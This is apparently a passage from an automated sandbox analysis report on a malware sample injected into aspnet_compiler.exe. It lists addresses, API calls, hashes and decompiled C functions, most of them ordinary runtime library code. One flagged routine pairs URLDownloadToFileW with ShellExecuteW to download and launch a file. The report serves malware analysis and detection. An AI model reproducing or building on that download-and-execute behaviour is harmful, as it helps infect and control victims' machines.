                    0x00406755
                    0x00000000
                    0x00406755
                    0x00406722
                    0x00406725
                    0x00406727
                    0x00000000
                    0x00406727
                    0x0040657f
                    0x00406582
                    0x00000000
                    0x00000000
                    0x00406588
                    0x0040658f
                    0x0040659b
                    0x004065a4
                    0x004065a6
                    0x0040664f
                    0x00406654
                    0x00406660
                    0x00406662
                    0x00000000
                    0x00406668
                    0x00406679
                    0x00406680
                    0x00406685
                    0x00406688
                    0x00000000
                    0x00406688
                    0x00406662
                    0x004065b5
                    0x004065d5
                    0x004065df
                    0x004065eb
                    0x004065f0
                    0x004065f4
                    0x004065f9
                    0x004065fb
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406630
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406714
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$open
                    • API String ID: 2825088817-4294605632
                    • Opcode ID: 2402fc3655f45c4dc183d6008799e5827585dc3f7f04836c9f6914f2199e61ed
                    • Instruction ID: 0db7feb28fe899170bc1ff05edd6f0e9b1c7309e9c1e85d08ff0b0aee6ae3b0b
                    • Opcode Fuzzy Hash: 2402fc3655f45c4dc183d6008799e5827585dc3f7f04836c9f6914f2199e61ed
                    • Instruction Fuzzy Hash: 2C61E531A0430157CA14FB75C8A69BE77A99FD1308F10093FF942771D2EE3D8919869B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00450943 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E00450943(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				signed int _t58;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr _t75;
				signed int _t76;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t119;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;
				signed int* _t129;
				int _t132;
				signed int _t133;
				void* _t134;

				_t50 =  *0x46f00c; // 0x54ba778e
				_v8 = _t50 ^ _t133;
				_t92 = E00446A95(__ebx, __ecx, __edx);
				_t129 =  *(E00446A95(_t92, __ecx, __edx) + 0x34c);
				_t132 = E00450C6B(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t129 & 0x00000300) - 0x300;
						if(( *_t129 & 0x00000300) == 0x300) {
							L39:
							__eflags =  !( *_t129 >> 2) & 0x00000001;
							L40:
							return E004338BB(_v8 ^ _t133);
						}
						asm("sbb ecx, ecx");
						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t67;
						if(_t67 != 0) {
							_t69 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
							__eflags = _t69;
							if(_t69 != 0) {
								__eflags =  *(_t92 + 0x60);
								if( *(_t92 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t92 + 0x5c);
								if( *(_t92 + 0x5c) == 0) {
									goto L39;
								}
								_t72 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
								__eflags = _t72;
								if(_t72 != 0) {
									goto L39;
								}
								_push(_t129);
								_t73 = E00450DC3(0, _t132, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								__eflags = _t129[1];
								L37:
								if(__eflags == 0) {
									_t129[1] = _t132;
								}
								goto L39;
							}
							 *_t129 =  *_t129 | 0x00000200;
							_t123 =  *_t129;
							__eflags =  *(_t92 + 0x60) - _t69;
							if( *(_t92 + 0x60) == _t69) {
								__eflags =  *(_t92 + 0x5c) - _t69;
								if( *(_t92 + 0x5c) == _t69) {
									goto L23;
								}
								_t113 =  *((intOrPtr*)(_t92 + 0x50));
								_v256 = _t113 + 2;
								do {
									_t75 =  *_t113;
									_t113 = _t113 + 2;
									__eflags = _t75 - _v252;
								} while (_t75 != _v252);
								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
									_t69 = 0;
									goto L23;
								}
								_push(_t129);
								_t76 = E00450DC3(_t92, _t132, 1);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								_t69 = 0;
								L24:
								__eflags = _t129[1] - _t69;
								goto L37;
							}
							L23:
							_t124 = _t123 | 0x00000100;
							__eflags = _t124;
							 *_t129 = _t124;
							goto L24;
						}
						 *_t129 = _t67;
						L2:
						goto L40;
					}
					asm("sbb eax, eax");
					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t84;
					if(_t84 == 0) {
						goto L1;
					}
					_t86 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
					_pop(_t117);
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t129 & 0x00000002;
						if(( *_t129 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t92 + 0x5c);
						if( *(_t92 + 0x5c) == 0) {
							L14:
							_t125 =  *_t129;
							__eflags = _t125 & 0x00000001;
							if((_t125 & 0x00000001) != 0) {
								goto L18;
							}
							_t87 = E00450D9F(_t132);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t126 = _t125 | 0x00000001;
							__eflags = _t126;
							 *_t129 = _t126;
							goto L17;
						}
						_t89 = E0044008E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
						_t134 = _t134 + 0xc;
						__eflags = _t89;
						if(_t89 != 0) {
							goto L14;
						}
						 *_t129 =  *_t129 | 0x00000002;
						__eflags =  *_t129;
						_t129[2] = _t132;
						_t119 =  *((intOrPtr*)(_t92 + 0x50));
						_t127 = _t119 + 2;
						do {
							_t90 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t90 - _v252;
						} while (_t90 != _v252);
						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
							_t129[1] = _t132;
						}
					} else {
						 *_t129 =  *_t129 | 0x00000304;
						_t129[1] = _t132;
						L17:
						_t129[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t129 =  *_t129 & 0x00000000;
				goto L2;
			}


































                    0x0045094e
                    0x00450955
                    0x00450963
                    0x0045096b
                    0x0045097a
                    0x00450986
                    0x0045099f
                    0x004509b6
                    0x004509bb
                    0x004509c4
                    0x004509c6
                    0x00450a79
                    0x00450a82
                    0x00450a84
                    0x00450b76
                    0x00450b7d
                    0x00450b80
                    0x00450b90
                    0x00450b90
                    0x00450a97
                    0x00450aa8
                    0x00450aae
                    0x00450ab0
                    0x00450ac3
                    0x00450aca
                    0x00450acc
                    0x00450b38
                    0x00450b3b
                    0x00000000
                    0x00000000
                    0x00450b3d
                    0x00450b40
                    0x00000000
                    0x00000000
                    0x00450b4c
                    0x00450b53
                    0x00450b55
                    0x00000000
                    0x00000000
                    0x00450b57
                    0x00450b5c
                    0x00450b64
                    0x00450b66
                    0x00000000
                    0x00000000
                    0x00450b68
                    0x00450b6e
                    0x00450b71
                    0x00450b71
                    0x00450b73
                    0x00450b73
                    0x00000000
                    0x00450b71
                    0x00450ace
                    0x00450ad4
                    0x00450ad6
                    0x00450ad9
                    0x00450aeb
                    0x00450aee
                    0x00000000
                    0x00000000
                    0x00450af0
                    0x00450af6
                    0x00450afc
                    0x00450afc
                    0x00450aff
                    0x00450b02
                    0x00450b02
                    0x00450b13
                    0x00450b16
                    0x00450b32
                    0x00000000
                    0x00450b32
                    0x00450b18
                    0x00450b1c
                    0x00450b24
                    0x00450b26
                    0x00000000
                    0x00000000
                    0x00450b28
                    0x00450b2e
                    0x00450ae3
                    0x00450ae3
                    0x00000000
                    0x00450ae3
                    0x00450adb
                    0x00450adb
                    0x00450adb
                    0x00450ae1
                    0x00000000
                    0x00450ae1
                    0x00450ab2
                    0x004509a4
                    0x00000000
                    0x004509a6
                    0x004509da
                    0x004509e8
                    0x004509ee
                    0x004509f0
                    0x00000000
                    0x00000000
                    0x004509fc
                    0x00450a02
                    0x00450a03
                    0x00450a05
                    0x00450a12
                    0x00450a15
                    0x00000000
                    0x00000000
                    0x00450a17
                    0x00450a1b
                    0x00450a5f
                    0x00450a5f
                    0x00450a61
                    0x00450a64
                    0x00000000
                    0x00000000
                    0x00450a67
                    0x00450a6d
                    0x00450a6f
                    0x00000000
                    0x00000000
                    0x00450a71
                    0x00450a71
                    0x00450a74
                    0x00000000
                    0x00450a74
                    0x00450a2a
                    0x00450a2f
                    0x00450a32
                    0x00450a34
                    0x00000000
                    0x00000000
                    0x00450a36
                    0x00450a36
                    0x00450a39
                    0x00450a3c
                    0x00450a3f
                    0x00450a42
                    0x00450a42
                    0x00450a45
                    0x00450a48
                    0x00450a48
                    0x00450a55
                    0x00450a58
                    0x00450a5a
                    0x00450a5a
                    0x00450a07
                    0x00450a07
                    0x00450a0d
                    0x00450a76
                    0x00450a76
                    0x00450a76
                    0x00000000
                    0x00450a05
                    0x004509a1
                    0x004509a1
                    0x00000000

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450997
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004509E8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450AA8
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                    • Instruction ID: da7bcabd89bfc395045dfa7eb9e966dc36f5abb2093a3d853536695ab6a7a704
                    • Opcode Fuzzy Hash: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                    • Instruction Fuzzy Hash: E361A3795002079FEB289F64CC82B7B77A8EF14306F1081ABED05C6246E778ED49CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0043A3F1 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E0043A3F1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x46f00c; // 0x54ba778e
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0043349F(_t41);
					_pop(_t62);
				}
				E00435760(_t67,  &_v804, 0, 0x50);
				E00435760(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0043349F(_t57);
				}
				return E004338BB(_v8 ^ _t70);
			}




































                    0x0043a3f1
                    0x0043a3f1
                    0x0043a3f1
                    0x0043a3f1
                    0x0043a3fc
                    0x0043a401
                    0x0043a403
                    0x0043a40b
                    0x0043a40d
                    0x0043a410
                    0x0043a415
                    0x0043a415
                    0x0043a421
                    0x0043a434
                    0x0043a442
                    0x0043a448
                    0x0043a44e
                    0x0043a454
                    0x0043a45a
                    0x0043a460
                    0x0043a466
                    0x0043a46c
                    0x0043a472
                    0x0043a478
                    0x0043a47f
                    0x0043a486
                    0x0043a48d
                    0x0043a494
                    0x0043a49b
                    0x0043a4a2
                    0x0043a4a3
                    0x0043a4ac
                    0x0043a4b2
                    0x0043a4b5
                    0x0043a4bb
                    0x0043a4c8
                    0x0043a4d1
                    0x0043a4da
                    0x0043a4e3
                    0x0043a4f1
                    0x0043a4f3
                    0x0043a508
                    0x0043a514
                    0x0043a517
                    0x0043a51c
                    0x0043a52b

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0043A4E9
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043A4F3
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043A500
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                    • Instruction ID: 1402d3c3d6381031a2721457eed26b4c58248f3cce99d36bfdd4232644ff5fa2
                    • Opcode Fuzzy Hash: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                    • Instruction Fuzzy Hash: 3031D37590132CABCB21DF24D88879DBBB8AF08315F5052EAE81CA7251E7749B858F49
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00441B85 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00441B85(int _a4) {
				void* _t14;
				void* _t16;

				if(E00447549(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00441C0A(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                    0x00441b91
                    0x00441bad
                    0x00441bad
                    0x00441bb6
                    0x00441bbf

                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,00441B5B,?), ref: 00441BA6
                    • TerminateProcess.KERNEL32(00000000,?,00441B5B,?), ref: 00441BAD
                    • ExitProcess.KERNEL32 ref: 00441BBF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                    • Instruction ID: 3981a427e79a20866ec782955a96dc1f6ef246171a4a80411b7f48c71aa59ebf
                    • Opcode Fuzzy Hash: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                    • Instruction Fuzzy Hash: 18E0BF31005348ABDF116F65EE49E593B69EB44356F0040A5F8094A632DB39ED82CA88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0043354D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E0043354D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x46fd1c =  *0x46fd1c & 0x00000000;
				 *0x46f010 =  *0x46f010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x46f010 =  *0x46f010 | 0x00000002;
				 *0x46fd1c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x46fd20; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x46fd20 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x46f010 =  *0x46f010 | 0x00000004;
						 *0x46fd1c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x46f010; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x46fd1c = 3;
								 *0x46f010 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x46fd1c = 5;
									 *0x46f010 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x46fd20; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x46fd20 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                    0x0043354d
                    0x00433550
                    0x0043355e
                    0x0043356d
                    0x004336ea
                    0x004336f0
                    0x004336f0
                    0x00433573
                    0x00433579
                    0x00433584
                    0x0043358a
                    0x0043358d
                    0x0043358e
                    0x00433592
                    0x00433593
                    0x00433595
                    0x00433598
                    0x0043359d
                    0x004335a6
                    0x004335b7
                    0x004335c2
                    0x004335c8
                    0x004335c9
                    0x004335d1
                    0x004335d7
                    0x004335d9
                    0x004335dc
                    0x004335df
                    0x004335e2
                    0x00433627
                    0x00433627
                    0x0043362d
                    0x00433634
                    0x00433637
                    0x0043363a
                    0x0043363d
                    0x00433640
                    0x00433644
                    0x00433647
                    0x00433648
                    0x0043364d
                    0x00433650
                    0x00433652
                    0x00433655
                    0x00433658
                    0x0043365b
                    0x00433663
                    0x00433666
                    0x00433669
                    0x0043366e
                    0x0043366e
                    0x00433669
                    0x0043367b
                    0x0043367d
                    0x00433684
                    0x00433693
                    0x0043369e
                    0x004336a1
                    0x004336a4
                    0x004336b5
                    0x004336bb
                    0x004336c0
                    0x004336c3
                    0x004336d1
                    0x004336d6
                    0x004336db
                    0x004336e5
                    0x004336e5
                    0x004336d6
                    0x004336b5
                    0x00433693
                    0x00000000
                    0x0043367b
                    0x004335e7
                    0x004335f1
                    0x00433616
                    0x0043361c
                    0x0043361f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00433566
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID: P@
                    • API String ID: 2325560087-676759640
                    • Opcode ID: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                    • Instruction ID: a2294149a4fe3e39a77fcac35e687f8d246c97dff2426aff95b936701e7ffbe2
                    • Opcode Fuzzy Hash: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                    • Instruction Fuzzy Hash: 02516B71D002089FEB24CFA9E98669EBBF4FB08315F14917AD455E7350E374AA04CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044D0F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E0044D0F9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E004443F4(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E00440303(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0044D338(_a16, __eflags, _t111);
							E00445002(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E00440303(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0043A5E8();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x46f00c; // 0x54ba778e
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00454B80(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00435760(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0044D0F9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0043F8D0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0044CF51);
									}
								} else {
									_push(_t55);
									_t57 = E0044D0F9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0044D0F9(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
